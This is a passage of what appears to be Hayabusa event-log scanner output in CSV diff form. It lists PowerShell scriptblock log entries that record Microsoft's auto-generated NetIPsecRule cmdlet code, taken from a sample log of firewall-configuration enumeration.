$true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 